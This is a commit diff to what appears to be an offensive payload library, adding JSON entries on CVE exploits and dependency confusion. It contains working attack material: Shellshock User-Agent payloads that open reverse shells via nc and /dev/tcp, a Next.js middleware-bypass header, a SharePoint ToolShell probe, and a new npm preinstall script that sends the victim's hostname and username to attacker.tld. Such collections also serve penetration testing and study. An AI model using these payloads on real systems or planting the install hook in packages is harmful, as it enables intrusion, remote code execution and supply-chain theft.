Skip to content

Commit 936468b

Browse files
committed
content: currency additions to payload categories (RU+EN)
- CVE Exploits: SharePoint "ToolShell" CVE-2025-53770 — unauth ViewState deserialization RCE (ToolPane.aspx probe, MachineKey rotation note). - Request Smuggling: CL.0 / 0.CL desync class (PortSwigger "HTTP/1.1 Must Die" 2025) — desync without Transfer-Encoding. - SSTI Smarty: working modern-Smarty RCE (static-method webshell write, template_object/math CVEs); the old {system}/{php} are flagged as blocked/removed on Smarty 3.1+. - Dependency Confusion: the actual NPM execution primitive (preinstall/postinstall package.json), which the category was missing. Kept CVE content payload-shaped (concrete reusable probes), not a stale CVE catalog.
1 parent fc65d7a commit 936468b

8 files changed

Lines changed: 980 additions & 224 deletions

File tree

‎seed/curated-en/cve-exploits.json‎

Lines changed: 79 additions & 13 deletions
Original file line numberDiff line numberDiff line change
@@ -6,27 +6,66 @@
66
"subcategory": "Tools",
77
"title": "CVE databases and tools",
88
"language": "text",
9-
"tags": ["cve", "tools", "recon"],
9+
"tags": [
10+
"cve",
11+
"tools",
12+
"recon"
13+
],
1014
"body": "Trickest CVE - automated collection of CVEs and PoCs (github.com/trickest/cve).\nNuclei Templates - community templates for finding vulnerabilities.\nMetasploit Framework - ready-made exploits.\nCVE Details (cvedetails.com) - vulnerability database."
1115
},
1216
{
1317
"subcategory": "Major CVEs",
1418
"title": "Landmark CVEs over 15 years",
1519
"language": "table",
16-
"tags": ["cve", "reference"],
20+
"tags": [
21+
"cve",
22+
"reference"
23+
],
1724
"body": "eternalblue struts drupalgeddon bluekeep citrix heartbleed shellshock",
1825
"meta": {
1926
"kind": "table",
2027
"table": {
21-
"headers": ["CVE", "Name", "Summary"],
28+
"headers": [
29+
"CVE",
30+
"Name",
31+
"Summary"
32+
],
2233
"rows": [
23-
["CVE-2017-0144", "EternalBlue", "RCE in SMBv1 (Windows) via specially crafted packets"],
24-
["CVE-2017-5638", "Apache Struts 2", "RCE via the Content-Type header"],
25-
["CVE-2018-7600", "Drupalgeddon 2", "RCE in Drupal 7.x / 8.x"],
26-
["CVE-2019-0708", "BlueKeep", "Pre-auth RCE in RDP (Remote Desktop Services)"],
27-
["CVE-2019-19781", "Citrix ADC / NetScaler", "Pre-auth RCE (path traversal -> execution)"],
28-
["CVE-2014-0160", "Heartbleed", "Memory leak in OpenSSL (TLS heartbeat)"],
29-
["CVE-2014-6271", "Shellshock", "RCE via environment variables in Bash (CGI)"]
34+
[
35+
"CVE-2017-0144",
36+
"EternalBlue",
37+
"RCE in SMBv1 (Windows) via specially crafted packets"
38+
],
39+
[
40+
"CVE-2017-5638",
41+
"Apache Struts 2",
42+
"RCE via the Content-Type header"
43+
],
44+
[
45+
"CVE-2018-7600",
46+
"Drupalgeddon 2",
47+
"RCE in Drupal 7.x / 8.x"
48+
],
49+
[
50+
"CVE-2019-0708",
51+
"BlueKeep",
52+
"Pre-auth RCE in RDP (Remote Desktop Services)"
53+
],
54+
[
55+
"CVE-2019-19781",
56+
"Citrix ADC / NetScaler",
57+
"Pre-auth RCE (path traversal -> execution)"
58+
],
59+
[
60+
"CVE-2014-0160",
61+
"Heartbleed",
62+
"Memory leak in OpenSSL (TLS heartbeat)"
63+
],
64+
[
65+
"CVE-2014-6271",
66+
"Shellshock",
67+
"RCE via environment variables in Bash (CGI)"
68+
]
3069
]
3170
}
3271
}
@@ -35,22 +74,49 @@
3574
"subcategory": "Shellshock",
3675
"title": "Shellshock - RCE via User-Agent (CGI)",
3776
"language": "bash",
38-
"tags": ["shellshock", "cve-2014-6271", "rce"],
77+
"tags": [
78+
"shellshock",
79+
"cve-2014-6271",
80+
"rce"
81+
],
3982
"body": "echo -e \"HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () { :;}; /usr/bin/nc 10.0.0.2 4444 -e /bin/sh\\r\\n\"\ncurl --silent -k -H \"User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.0.0.2/4444 0>&1\" \"https://10.0.0.1/cgi-bin/admin.cgi\""
4083
},
4184
{
4285
"subcategory": "Next.js CVE-2025-29927",
4386
"title": "Next.js Middleware Bypass (CVE-2025-29927)",
4487
"language": "text",
45-
"tags": ["nextjs", "cve-2025-29927", "auth-bypass", "middleware"],
88+
"tags": [
89+
"nextjs",
90+
"cve-2025-29927",
91+
"auth-bypass",
92+
"middleware"
93+
],
4694
"body": "Middleware bypass in Next.js (affected versions 11.1.4 - 15.2.2). Next.js middleware often carries authorization checks, redirects for unauthenticated users, security-header injection. To keep internal sub-requests from looping back through middleware, Next tags them with the x-middleware-subrequest header. The bug: the framework trusts that header even when it arrives from OUTSIDE. By sending it, an attacker passes their request off as internal and Next skips middleware entirely.\n\nImpact: bypass of authentication and authorization on routes guarded ONLY by middleware; bypass of redirects, CSP and any other checks set in middleware. CVSS 9.1, CWE-287.\n\nFix: Next.js 14.2.25 / 15.2.3 and later. Workaround without upgrading: strip the x-middleware-subrequest header at the WAF or reverse proxy.\n\nFinding targets: shodan/fofa for `x-middleware-rewrite`; Next responses often expose `x-nextjs-*` / `x-middleware-*` headers. Confirm: compare access to a protected route without the header (302/401/403) and with it (200)."
4795
},
4896
{
4997
"subcategory": "Next.js CVE-2025-29927",
5098
"title": "Next.js CVE-2025-29927: exploitation via header",
5199
"language": "http",
52-
"tags": ["nextjs", "cve-2025-29927", "payload", "auth-bypass"],
100+
"tags": [
101+
"nextjs",
102+
"cve-2025-29927",
103+
"payload",
104+
"auth-bypass"
105+
],
53106
"body": "# Bypass middleware (for example an authorization check) on a protected route.\n# The header convinces Next.js the request already passed middleware, so it is skipped.\nGET /admin/dashboard HTTP/1.1\nHost: example.com\nX-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware\n\n# App Router (Next 13+): repeat the \"middleware:\" chain by route nesting depth.\n# Pages Router / older versions use src/middleware and pages/_middleware.\n# Universal value (covers both schemes, as in the nuclei template):\n# X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware"
107+
},
108+
{
109+
"subcategory": "SharePoint ToolShell CVE-2025-53770",
110+
"title": "SharePoint 'ToolShell' — unauth deserialization RCE (CVE-2025-53770)",
111+
"language": "http",
112+
"tags": [
113+
"cve-2025-53770",
114+
"sharepoint",
115+
"deserialization",
116+
"rce",
117+
"kev"
118+
],
119+
"body": "Unauthenticated RCE on on-prem Microsoft SharePoint via deserialization of untrusted data (ViewState). CVSS 9.8, CISA KEV, actively exploited ITW since July 2025. Part of the ToolShell chain (with CVE-2025-49704/49706/53771): auth bypass + forged __VIEWSTATE via ToolPane.aspx -> code under the IIS app pool; attackers first steal the MachineKey (ValidationKey/DecryptionKey) to keep signing ViewState — so a patch ALONE is not enough, you must rotate the key.\nAffects SharePoint Server 2016 / 2019 / Subscription Edition (Online is NOT affected).\nProbe: POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit with Referer: /_layouts/SignOut.aspx. Fix: the July MS patch + ROTATE the MachineKey + enable AMSI."
54120
}
55121
]
56122
}

‎seed/curated-en/dependency-confusion.json‎

Lines changed: 57 additions & 11 deletions
Original file line numberDiff line numberDiff line change
@@ -6,32 +6,59 @@
66
"subcategory": "Methodology",
77
"title": "What is Dependency Confusion",
88
"language": "text",
9-
"tags": ["methodology", "supply-chain"],
9+
"tags": [
10+
"methodology",
11+
"supply-chain"
12+
],
1013
"body": "Dependency Confusion (a dependency substitution attack, also known as supply chain substitution) happens when an install script is tricked into downloading a malicious file from a public repository instead of the intended file with the same name from a company's internal (private) repository.\n\nThe gist: the package manager sees a package in the public registry with the same name as a private one but with a higher version, and pulls exactly that public (malicious) package. This is how the attacker's code ends up in the victim's build or environment."
1114
},
1215
{
1316
"subcategory": "Methodology",
1417
"title": "The attack idea and where to find private package names",
1518
"language": "text",
16-
"tags": ["methodology", "recon"],
19+
"tags": [
20+
"methodology",
21+
"recon"
22+
],
1723
"body": "Look for npm, pip, gem packages - the methodology is the same: you register a public package with the same name as a private one used by the company, and wait until it gets pulled in.\n\nWhere to look for private package names:\n- Dependency manifests in source code and artifacts: package.json, composer.json, requirements.txt, pom.xml, Dockerfile.\n- Leaked or public builds, frontend JS bundles, build errors in CI, caches.\n\nAlgorithm: list all dependencies from the manifests -> find the ones that are not in the public registry -> register a public package with the same name."
1824
},
1925
{
2026
"subcategory": "Methodology",
2127
"title": "Ecosystem -> dependency manifest file",
2228
"language": "table",
23-
"tags": ["methodology", "recon"],
29+
"tags": [
30+
"methodology",
31+
"recon"
32+
],
2433
"body": "",
2534
"meta": {
2635
"kind": "table",
2736
"table": {
28-
"headers": ["Ecosystem (manager)", "Manifest file"],
37+
"headers": [
38+
"Ecosystem (manager)",
39+
"Manifest file"
40+
],
2941
"rows": [
30-
["DockerHub", "Dockerfile image"],
31-
["JavaScript (npm)", "package.json"],
32-
["MVN (maven)", "pom.xml"],
33-
["PHP (composer)", "composer.json"],
34-
["Python (pypi)", "requirements.txt"]
42+
[
43+
"DockerHub",
44+
"Dockerfile image"
45+
],
46+
[
47+
"JavaScript (npm)",
48+
"package.json"
49+
],
50+
[
51+
"MVN (maven)",
52+
"pom.xml"
53+
],
54+
[
55+
"PHP (composer)",
56+
"composer.json"
57+
],
58+
[
59+
"Python (pypi)",
60+
"requirements.txt"
61+
]
3562
]
3663
}
3764
}
@@ -40,14 +67,33 @@
4067
"subcategory": "NPM",
4168
"title": "NPM - step-by-step exploitation scenario",
4269
"language": "text",
43-
"tags": ["npm", "javascript", "exploitation"],
70+
"tags": [
71+
"npm",
72+
"javascript",
73+
"exploitation"
74+
],
4475
"body": "Scenario using npm as an example:\n\n1. List all packages from the manifests (package.json, composer.json, ...).\n2. Find a package that is not on www.npmjs.com (absent from the public registry - a substitution candidate).\n3. Register and create a PUBLIC package with the same name.\n\nExample exploit package: 0xsapra/dependency-confusion-expoit (github.com/0xsapra/dependency-confusion-expoit)."
4576
},
77+
{
78+
"subcategory": "NPM",
79+
"title": "NPM — the execution primitive (preinstall/postinstall)",
80+
"language": "json",
81+
"tags": [
82+
"dependency-confusion",
83+
"npm",
84+
"postinstall",
85+
"rce"
86+
],
87+
"body": "// Code runs through npm lifecycle scripts at INSTALL time.\n// Publish to the public npm a package with the private name and a version above any internal one:\n{\n \"name\": \"@org/internal-lib\",\n \"version\": \"99.9.9\",\n \"scripts\": {\n \"preinstall\": \"node -e \\\"require('child_process').exec('curl https://attacker.tld/cb?h='+require('os').hostname()+'.'+require('os').userInfo().username)\\\"\"\n }\n}\n// the victim's npm install (often in CI) -> callback. Bonus: a misconfigured .npmrc/scoped registry resolves @org to public npm."
88+
},
4689
{
4790
"subcategory": "Tools",
4891
"title": "Tools for finding dependency confusion",
4992
"language": "text",
50-
"tags": ["tools", "automation"],
93+
"tags": [
94+
"tools",
95+
"automation"
96+
],
5197
"body": "- visma-prodsec/confused - checks for dependency confusion vulnerabilities across several package management systems (github.com/visma-prodsec/confused).\n- synacktiv/DepFuzzer - finds dependency confusion or projects where you can take over the package owner's email (github.com/synacktiv/DepFuzzer)."
5298
}
5399
]

0 commit comments

Comments
 (0)